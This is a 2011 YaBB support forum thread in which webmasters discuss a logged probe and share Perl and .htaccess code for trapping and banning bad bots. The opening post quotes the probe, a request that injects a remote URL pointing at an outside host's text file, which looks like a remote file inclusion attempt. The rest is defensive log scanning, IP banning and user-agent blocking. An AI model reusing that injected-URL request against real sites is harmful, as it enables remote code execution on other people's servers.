Ok, what were they trying to do here? (Read 2,407 times)
BloodyRue
Junior Member
**
Offline



Posts: 83

None
Ok, what were they trying to do here?
Dec 9th, 2011 at 2:56pm
Got a spammer doing this:
Code
yabb2/YaBB.pl?num=xxxxxxxx//delete_all.php?board_skin_path=http://show.ideatree.kr//test/flexupload/auto1.txt?? 



What in the world are they doing there? I IP-denied their entire block.
  

   
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,399
Location: Earth

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #1 - Dec 9th, 2011 at 4:04pm
Can't say exactly what they're trying, but it can't possibly be good.

I know my server error files show dozens of attempts per day to access PHP files in the YaBB directory. (Which, needless to say, don't exist.)

I'm beginning to wonder what potential flaw in PHP these people are trying to exploit. (In your example they're invoking a path to a non-existent PHP file too.)
  

If you only have one solution to a problem you're not trying hard enough!
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,399
Location: Earth

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #2 - Dec 9th, 2011 at 6:15pm
I passed this along to a programmer on another board, and this is their response:
Quote:
Looks like it's trying to leverage some kind of vuln in YaBB.pl that would cause a request to be made on a separate site that has a different vulnerability. It's a nasty attempt at an XSS/CSRF vulnerability.


I would say it's a good idea to keep an eye on this. It may or may not be a real vulnerability in YaBB.
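
If you want to spot more of these probes in your own logs, a rough sketch along these lines works - the log path is just an example and this isn't anything from YaBB itself, so adjust it for your own server. It simply flags any request whose query string drags in a second URL:
Code
#!/usr/bin/perl
# Rough sketch: print access-log lines whose query string embeds another
# http:// or https:// URL - the signature of the remote-inclusion probe above.
# The log path is only an example; point it at your own access log.
use strict;
use warnings;

my $logfile = '/var/log/apache2/access.log';

open(my $log, '<', $logfile) or die "can't open $logfile: $!";
while (my $line = <$log>) {
    # A combined-format request field looks like: "GET /path?query HTTP/1.1"
    print $line if $line =~ m{"(?:GET|POST)\s+\S*\?\S*https?://}i;
}
close($log);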
  

If you only have one solution to a problem you're not trying hard enough!
 
JonB
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 3,934
Location: Land of the Blazing Sun!

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #3 - Dec 9th, 2011 at 7:47pm
Hi guys -

I would agree with Dandello's friend's assessment. This surely should be a wake-up call for those who don't look through their access/server/error logs.

I ran a high-volume set of self-hosted websites for about 6-7 years and was on patrol constantly, and that was with a multi-thousand-dollar investment in a free-standing piece of authentication software and plenty of money spent on Cisco content routers (plus my learning curve and time). We managed to do a good job, but that wasn't for any lack of commitment on the part of hackers and ne'er-do-wells trying to hijack and steal...


A webmaster's best friend is his/her logfiles.  Cheesy

Cool
  

I find your lack of faith disturbing.
 
BloodyRue
Junior Member
**
Offline



Posts: 83

None
Re: Ok, what were they trying to do here?
Reply #4 - Dec 10th, 2011 at 1:35am
I have seen all kinds of odd things in the error logs since I installed YaBB: stuff with spaces and weird characters after "action=". I see there used to be security-hack and directory-tree-reading issues with this in earlier versions.

I also get a lot of people trying to hit yabb.cgi and index.php as well. I put in a referrer statement that blasts them straight into .htaccess and a ban.

This one was strange because of the intent: someone trying to use a delete command on everything.
  

   
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,399
Location: Earth

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #5 - Dec 10th, 2011 at 4:14am
I get them too, and from what I gather, so do people running other forum software. Since forum software is designed to accept form input, spammers and bots try to exploit anything that looks like a form or query string.

Tell us more about the referrer statement blasting them into the ether.
« Last Edit: Dec 10th, 2011 at 4:21am by Dandello »  

If you only have one solution to a problem you're not trying hard enough!
 
BloodyRue
Junior Member
**
Offline



Posts: 83

None
Re: Ok, what were they trying to do here?
Reply #6 - Dec 10th, 2011 at 7:23am
Dandello wrote on Dec 10th, 2011 at 4:14am:
Tell us more about the referrer statement blasting them into the ether.


It's a bit complicated, but when I started my other boards about 10 years ago I did some security coding to keep bad bots and other junk from getting into directories or harvesting stuff. It's a series of CGI scripts and SSI exec includes that dump offenders into the .htaccess file with a statement blocking them. I recently added these lines to catch anyone trying to hit the YaBB CGI file:

Placed in the .htaccess file:
Code
#blocking spammers for yabb
RedirectMatch YaBB.cgi http://mydomain/cgi-bin/trap.cgi
 



trap.cgi is a script that auto-writes the ban entries. I have a bunch of code that writes log files to keep track of what it's doing, but the main portion of trap.cgi looks like this:
Code
$test=0;  # if test ==1 then it wont write the htaccess
$basedir = $ENV{DOCUMENT_ROOT};
$htafile = "/\.htaccess";
$termsfile = "/badbot\.htm";
$digestfile = "/spam\.dat";

# Form full pathname to .htaccess file
$htapath = "$basedir"."$htafile";

# Form full pathname to terms.htm file
$termspath = "$basedir"."$termsfile";
$digestpath = "$basedir"."$digestfile";

&trapem;
exit;

sub trapem{
 # Get the bad-bot's IP address, convert to regular-expressions
 #(regex) format by escaping all periods.
 $remaddr = $ENV{REMOTE_ADDR};
 $remaddr =~ s/\./\\\./gi;

 # Get User-agent & current time
 $usragnt = $ENV{HTTP_USER_AGENT};
 $date = scalar localtime(time);

 # Open the .htaccess file and wait for an exclusive lock. This
 # prevents multiple instances of this script from running past
 # the flock statement, and prevents them from trying to read and
 # write the file at the same time, which would corrupt it.
 # When .htaccess is closed, the lock is released.
 #
 # Open existing .htaccess file in r/w append mode, lock it, rewind
 # to start, read current contents into array.

 if($test ne "1"){
   open(HTACCESS,"+>>$htapath") || die $!;
   flock(HTACCESS,2);
   seek(HTACCESS,0,0);
   @contents = <HTACCESS>;

   # Empty existing .htaccess file, then write new IP ban line and
   # previous contents to it
   truncate(HTACCESS,0);
   print HTACCESS ("SetEnvIf Remote_Addr \^$remaddr\$ getout \# $date $usragnt\n");
   print HTACCESS (@contents);

   # close the .htaccess file, releasing lock - allow other instances
   # of this script to proceed.
   close(HTACCESS);
  }
} 
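
($termspath and $digestpath above are used by the logging parts I cut out.) A stripped-down sketch of what that missing piece can look like - placeholders only, my real script logs and does a lot more than this:
Code
#!/usr/bin/perl
# Sketch of the logging/response part left out above: append one line per
# trapped visitor to the spam.dat digest file, then answer with a plain 403.
# Placeholders only - not the actual trap.cgi code.
use strict;
use warnings;

my $digestpath = "$ENV{DOCUMENT_ROOT}/spam.dat";      # same file named above
my $remaddr    = $ENV{REMOTE_ADDR}     || 'unknown';
my $usragnt    = $ENV{HTTP_USER_AGENT} || 'unknown';
my $date       = scalar localtime(time);

open(my $digest, '>>', $digestpath) or die "can't open $digestpath: $!";
flock($digest, 2);                                    # exclusive lock, as above
print {$digest} "$date\t$remaddr\t$usragnt\n";
close($digest);

# A CGI script still has to answer the request somehow.
print "Status: 403 Forbidden\r\n";
print "Content-Type: text/plain\r\n\r\n";
print "Forbidden.\n";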



I have stuff written into my script files that bad bots look for but that you can't see unless you are parsing the source code. If a bad bot touches it, it sends them to this trap file and bans them as well.
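
It boils down to something like this (just an illustration, not my actual markup) - a small CGI or SSI-included snippet whose output no human ever sees but a source-parsing bot will chase:
Code
#!/usr/bin/perl
# Hypothetical honeypot sketch: print a link real visitors never see but
# source-parsing bots will follow straight into the trap. Illustrative only.
use strict;
use warnings;

print "Content-Type: text/html\r\n\r\n";
print qq{<div style="display:none"><a href="/cgi-bin/trap.cgi">trap</a></div>\n};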

The resulting .htaccess file looks like this at the top:
Code
SetEnvIf Remote_Addr ^31\.214\.144\.222$ getout # Sat Dec 10 10:57:09 2011 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
SetEnvIf Remote_Addr ^173\.193\.219\.168$ getout # Mon Dec  5 14:16:35 2011 Aboundex/0.2 (http://www.aboundex.com/crawler/)
SetEnvIf Remote_Addr ^74\.202\.210\.158$ getout # Sat Dec  3 23:09:47 2011 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100721 Firefox/3.6.8
SetEnvIf Remote_Addr ^69\.4\.231\.201$ getout # Mon Nov 28 20:08:16 2011 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 



This is in the root .htaccess file:
Code
# Block bad-bots using lines written by trap.cgi script above
SetEnvIf Request_URI "^(/403.*\.shtml|/robots\.txt|/badbot\.htm|/cgi-bin/stig403\.cgi|/cgi-bin/spit\.cgi)$" allowsome
<Files *>
Order Deny,Allow
Allow from env=allowsome
Deny from env=getout
Deny from env=spam_bot
</Files>
 



It then logs their entry, sends me an email, and emails their host with an abuse letter.
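
The mail step is roughly like this (addresses and subject are placeholders, not my real values):
Code
#!/usr/bin/perl
# Sketch of the notification step: pipe a short report to sendmail.
# Addresses and subject are placeholders.
use strict;
use warnings;

my $remaddr = $ENV{REMOTE_ADDR}     || 'unknown';
my $usragnt = $ENV{HTTP_USER_AGENT} || 'unknown';
my $date    = scalar localtime(time);

open(my $mail, '|-', '/usr/sbin/sendmail -t') or die "can't run sendmail: $!";
print {$mail} "To: webmaster\@mydomain\n";
print {$mail} "From: trap\@mydomain\n";
print {$mail} "Subject: Bad bot trapped: $remaddr\n";
print {$mail} "\n";
print {$mail} "Banned $remaddr at $date\n";
print {$mail} "User-Agent: $usragnt\n";
close($mail);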

Also, I have these presets in the root .htaccess file:
Code
SetEnvIfNoCase User-Agent "EmailCollector/1.0" spam_bot
SetEnvIfNoCase User-Agent "EmailSiphon" spam_bot
SetEnvIfNoCase User-Agent "EmailWolf 1.00" spam_bot
SetEnvIfNoCase User-Agent "Crescent Internet ToolPak HTTP OLE Control v.1.0" spam_bot
SetEnvIfNoCase User-Agent "ExtractorPro" spam_bot
SetEnvIfNoCase User-Agent "Mozilla/2.0 (compatible; NEWT ActiveX; Win32)" spam_bot
SetEnvIfNoCase User-Agent "/0.5 libwww-perl/0.40" spam_bot
SetEnvIfNoCase User-Agent "CherryPickerElite/1.0" spam_bot
SetEnvIfNoCase User-Agent "CherryPickerSE/1.0" spam_bot
SetEnvIfNoCase User-Agent "WebBandit/2.1" spam_bot
SetEnvIfNoCase User-Agent "WebBandit/3.50" spam_bot
SetEnvIfNoCase User-Agent "Webbandit/4.00.0" spam_bot
SetEnvIfNoCase User-Agent "Indy Library" spam_bot
SetEnvIfNoCase User-Agent "Internet Explore 5.x" spam_bot
SetEnvIfNoCase User-Agent "Microsoft URL Control - 6.00.8862" spam_bot
SetEnvIfNoCase User-Agent "Mozilla/3.0 (compatible; Indy Library)" spam_bot
SetEnvIfNoCase User-Agent "Java1.3.1" spam_bot
SetEnvIfNoCase User-Agent "URL_Spider_Pro/3.0 (http://www.innerprise.net/usp-spider.asp)" spam_bot
SetEnvIfNoCase User-Agent "IPiumBot laurion(dot)com" spam_bot
SetEnvIfNoCase User-Agent "URL_Spider_SQL/1.0" spam_bot
SetEnvIfNoCase User-Agent "Lynx/2.8.4rel.1 libwww-FM/2.14 ... human-guided@lerly.net" spam_bot
SetEnvIfNoCase User-Agent "W3CRobot/5.4.0 libwww/5.4.0" spam_bot
SetEnvIfNoCase User-Agent "Zeus 2.6" spam_bot
SetEnvIfNoCase User-Agent "Rover" spam_bot 

« Last Edit: Dec 10th, 2011 at 8:19pm by BloodyRue »  

   
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,399
Location: Earth

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #7 - Dec 10th, 2011 at 4:13pm
And you're NOT on the security team?  Shocked
  

If you only have one solution to a problem you're not trying hard enough!
 